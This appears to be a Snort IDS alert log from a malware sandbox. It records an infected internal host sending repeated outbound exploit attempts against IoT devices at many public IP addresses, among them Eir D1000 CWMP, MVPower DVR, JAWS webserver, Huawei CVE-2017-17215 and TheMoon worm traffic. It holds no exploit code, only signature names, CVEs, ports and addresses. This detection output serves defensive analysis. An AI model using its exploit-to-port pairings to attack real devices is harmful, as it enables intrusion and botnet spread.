Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:36394 -> 136.0.97.153:80
Source: Traffic	Snort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.23:58548 -> 18.155.192.223:80
Source: Traffic	Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:56454 -> 34.120.20.207:7547
Source: Traffic	Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:56464 -> 34.120.20.207:7547
Source: Traffic	Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:36536 -> 98.144.106.249:7547
Source: Traffic	Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:60288 -> 99.238.148.30:7547
Source: Traffic	Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:32984 -> 50.123.65.181:7547
Source: Traffic	Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:36552 -> 98.144.106.249:7547
Source: Traffic	Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:60308 -> 99.238.148.30:7547
Source: Traffic	Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:45278 -> 175.225.88.98:7547
Source: Traffic	Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:55052 -> 50.47.238.33:7547
Source: Traffic	Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:33010 -> 50.123.65.181:7547
Source: Traffic	Snort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:39478 -> 172.67.179.182:8080
Source: Traffic	Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:55086 -> 50.47.238.33:7547
Source: Traffic	Snort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:35142 -> 172.67.226.106:8080
Source: Traffic	Snort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:43902 -> 172.67.50.201:8080
Source: Traffic	Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:59830 -> 14.93.55.186:7547
Source: Traffic	Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:34456 -> 14.89.90.84:7547
Source: Traffic	Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:49898 -> 118.58.175.251:7547
Source: Traffic	Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:45316 -> 175.225.88.98:7547
Source: Traffic	Snort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:48644 -> 172.64.26.65:8080
Source: Traffic	Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:34514 -> 14.89.90.84:7547
Source: Traffic	Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:59884 -> 14.93.55.186:7547
Source: Traffic	Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:49954 -> 118.58.175.251:7547
Source: Traffic	Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:56468 -> 34.120.20.207:7547
Source: Traffic	Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:56470 -> 34.120.20.207:7547
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:48956 -> 52.207.236.202:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:36590 -> 136.0.97.153:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:45564 -> 62.99.89.49:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:50282 -> 23.40.210.21:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:48956 -> 52.207.236.202:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:37050 -> 149.56.42.88:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:36590 -> 136.0.97.153:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:45564 -> 62.99.89.49:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:50282 -> 23.40.210.21:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:37050 -> 149.56.42.88:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:50216 -> 23.40.210.21:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:52904 -> 119.206.182.2:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:54848 -> 195.245.82.70:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:45974 -> 77.55.170.67:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:54848 -> 195.245.82.70:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:36170 -> 43.141.130.162:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:40678 -> 58.214.18.227:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:40678 -> 58.214.18.227:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:50216 -> 23.40.210.21:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:50420 -> 23.40.210.21:80
Source: Traffic	Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:34090 -> 5.212.105.153:7547
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:48826 -> 89.161.189.73:80
Source: Traffic	Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:50292 -> 200.104.229.105:7547
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:59506 -> 92.248.32.183:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:45974 -> 77.55.170.67:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:56578 -> 38.11.227.79:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:50420 -> 23.40.210.21:80
Source: Traffic	Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:53148 -> 71.212.69.155:7547
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:48826 -> 89.161.189.73:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:59506 -> 92.248.32.183:80
Source: Traffic	Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:34170 -> 5.212.105.153:7547
Source: Traffic	Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:50372 -> 200.104.229.105:7547
Source: Traffic	Snort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:54168 -> 172.65.4.93:8080
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:56578 -> 38.11.227.79:80
Source: Traffic	Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:53416 -> 50.60.164.64:7547
Source: Traffic	Snort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:38588 -> 172.64.22.202:8080
Source: Traffic	Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:56160 -> 34.120.103.192:7547
Source: Traffic	Snort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:42730 -> 172.64.192.237:8080
Source: Traffic	Snort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:44786 -> 172.67.146.140:8080
Source: Traffic	Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:56230 -> 34.120.103.192:7547
Source: Traffic	Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:47558 -> 34.111.116.15:7547
Source: Traffic	Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:36290 -> 187.121.71.41:7547
Source: Traffic	Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:47566 -> 34.111.116.15:7547
Source: Traffic	Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:43138 -> 65.131.199.42:7547
Source: Traffic	Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:56090 -> 14.76.78.133:7547
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:55712 -> 190.133.76.0:52869
Source: Traffic	Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:34714 -> 121.162.12.221:7547
Source: Traffic	Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:36362 -> 187.121.71.41:7547
Source: Traffic	Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:43148 -> 65.131.199.42:7547
Source: Traffic	Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:53162 -> 71.212.69.155:7547
Source: Traffic	Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:56164 -> 14.76.78.133:7547
Source: Traffic	Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:34728 -> 121.162.12.221:7547
Source: Traffic	Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:57030 -> 27.237.206.203:7547
Source: Traffic	Snort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:55076 -> 172.65.106.150:8080
Source: Traffic	Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:57082 -> 27.237.206.203:7547
Source: Traffic	Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:44704 -> 67.1.131.119:7547
Source: Traffic	Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:57344 -> 95.12.209.68:7547
Source: Traffic	Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:55742 -> 14.42.115.120:7547
Source: Traffic	Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:38160 -> 119.221.3.247:7547
Source: Traffic	Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:44720 -> 67.1.131.119:7547
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:38794 -> 103.143.190.135:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:51354 -> 49.0.94.169:80
Source: Traffic	Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:57370 -> 95.12.209.68:7547
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:36170 -> 43.141.130.162:80
Source: Traffic	Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:55768 -> 14.42.115.120:7547
Source: Traffic	Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:38186 -> 119.221.3.247:7547
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:38794 -> 103.143.190.135:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:51354 -> 49.0.94.169:80
Source: Traffic	Snort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.23:41400 -> 45.200.58.142:80
Source: Traffic	Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:59228 -> 84.72.32.178:7547
Source: Traffic	Snort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.23:39382 -> 121.41.103.145:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:47222 -> 35.178.183.192:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:47222 -> 35.178.183.192:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:48234 -> 18.134.19.143:80
Source: Traffic	Snort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.23:32994 -> 20.229.55.177:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:35844 -> 84.35.121.8:80
Source: Traffic	Snort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:50942 -> 156.235.103.31:37215
Source: Traffic	Snort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:50942 -> 156.235.103.31:37215
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:48234 -> 18.134.19.143:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:35844 -> 84.35.121.8:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:59206 -> 43.143.211.162:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:59206 -> 43.143.211.162:80
Source: Traffic	Snort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.23:34506 -> 83.136.195.148:80
Source: Traffic	Snort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.23:55570 -> 162.241.9.32:80
Source: Traffic	Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:59360 -> 84.72.32.178:7547
Source: Traffic	Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:49230 -> 154.203.12.240:7547
Source: Traffic	Snort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:57866 -> 172.64.198.250:8080
Source: Traffic	Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:46382 -> 121.186.240.82:7547
Source: Traffic	Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:44530 -> 175.232.114.38:7547
Source: Traffic	Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:44538 -> 175.232.114.38:7547
Source: Traffic	Snort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.23:34158 -> 77.253.223.206:80
Source: Traffic	Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:50940 -> 164.155.147.120:7547
Source: Traffic	Snort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:44052 -> 172.65.194.175:8080
Source: Traffic	Snort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:54014 -> 172.67.233.250:8080
Source: Traffic	Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:36340 -> 52.223.20.244:7547
Source: Traffic	Snort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:34080 -> 172.66.213.120:8080
Source: Traffic	Snort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:42872 -> 172.67.130.22:8080
Source: Traffic	Snort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:47896 -> 172.67.183.113:8080
Source: Traffic	Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:36364 -> 52.223.20.244:7547
Source: Traffic	Snort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:47932 -> 172.67.183.113:8080
Source: Traffic	Snort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:42908 -> 172.67.130.22:8080
Source: Traffic	Snort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:35080 -> 172.65.55.40:8080
Source: Traffic	Snort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:34116 -> 172.66.213.120:8080
Source: Traffic	Snort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:56916 -> 172.67.157.3:8080
Source: Traffic	Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:51406 -> 133.114.112.241:7547
Source: Traffic	Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:57774 -> 61.108.147.225:7547
Source: Traffic	Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:55844 -> 110.239.180.158:7547
Source: Traffic	Snort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:35828 -> 98.98.203.9:8080
Source: Traffic	Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:51424 -> 133.114.112.241:7547
Source: Traffic	Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:46390 -> 121.186.240.82:7547
Source: Traffic	Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:57792 -> 61.108.147.225:7547
Source: Traffic	Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:55868 -> 110.239.180.158:7547
Source: Traffic	Snort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.23:48490 -> 92.63.62.74:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:34714 -> 109.33.25.151:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:38420 -> 104.27.23.103:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:39348 -> 123.240.201.73:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:39308 -> 104.232.109.40:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:38420 -> 104.27.23.103:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:50648 -> 45.59.160.240:80
Source: Traffic	Snort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.23:58400 -> 187.109.111.85:8080
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:37392 -> 210.241.78.55:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:34182 -> 75.103.88.248:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:39348 -> 123.240.201.73:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:39976 -> 104.66.74.160:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:50648 -> 45.59.160.240:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:55202 -> 192.91.218.48:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:39976 -> 104.66.74.160:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:55202 -> 192.91.218.48:80
Source: Traffic	Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:49338 -> 99.232.71.74:7547
Source: Traffic	Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:56670 -> 196.235.233.150:7547
Source: Traffic	Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:49384 -> 99.232.71.74:7547
Source: Traffic	Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:41134 -> 145.82.99.110:7547
Source: Traffic	Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:59100 -> 218.149.81.138:7547
Source: Traffic	Snort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:46454 -> 156.77.139.90:37215
Source: Traffic	Snort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:46454 -> 156.77.139.90:37215
Source: Traffic	Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:56728 -> 196.235.233.150:7547
Source: Traffic	Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:41194 -> 145.82.99.110:7547
Source: Traffic	Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:59162 -> 218.149.81.138:7547
Source: Traffic	Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:53558 -> 112.160.32.251:7547
Source: Traffic	Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:53584 -> 112.160.32.251:7547
Source: Traffic	Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:49322 -> 84.75.253.96:7547
Source: Traffic	Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:41172 -> 145.82.99.110:7547
Source: Traffic	Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:49392 -> 84.75.253.96:7547
Source: Traffic	Snort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:33514 -> 172.65.75.156:8080
Source: Traffic	Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:41242 -> 145.82.99.110:7547
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:51646 -> 35.186.214.0:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:41280 -> 146.190.138.31:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:37742 -> 83.69.204.26:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:41280 -> 146.190.138.31:80
Source: Traffic	Snort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:45378 -> 172.250.89.242:8080
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:37742 -> 83.69.204.26:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:45000 -> 52.202.239.22:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:45000 -> 52.202.239.22:80
Source: Traffic	Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:53426 -> 70.123.135.226:7547
Source: Traffic	Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:51796 -> 174.25.98.250:7547
Source: Traffic	Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:53502 -> 70.123.135.226:7547
Source: Traffic	Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:51874 -> 174.25.98.250:7547
Source: Traffic	Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:51544 -> 38.48.61.102:7547
Source: Traffic	Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:51548 -> 38.48.61.102:7547
Source: Traffic	Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:46602 -> 191.97.180.200:7547
Source: Traffic	Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:46616 -> 191.97.180.200:7547
Source: Traffic	Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:39192 -> 99.252.228.126:7547
Source: Traffic	Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:33260 -> 98.11.96.145:7547
Source: Traffic	Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:57492 -> 47.203.5.227:7547
Source: Traffic	Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:39204 -> 99.252.228.126:7547
Source: Traffic	Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:33272 -> 98.11.96.145:7547
Source: Traffic	Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:56614 -> 59.2.75.81:7547
Source: Traffic	Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:56628 -> 59.2.75.81:7547
Source: Traffic	Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:37778 -> 183.122.126.218:7547
Source: Traffic	Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:48398 -> 115.14.109.57:7547
Source: Traffic	Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:37832 -> 183.122.126.218:7547
Source: Traffic	Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:48456 -> 115.14.109.57:7547
Source: Traffic	Snort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.23:35996 -> 52.200.57.84:80
Source: Traffic	Snort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.23:38962 -> 23.12.21.149:80
Source: Traffic	Snort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.23:38954 -> 23.12.21.149:80
Source: Traffic	Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:36626 -> 47.187.168.226:7547
Source: Traffic	Snort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.23:51694 -> 104.18.110.7:80
Source: Traffic	Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:32834 -> 179.113.73.67:7547
Source: Traffic	Snort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.23:50558 -> 5.103.44.190:80
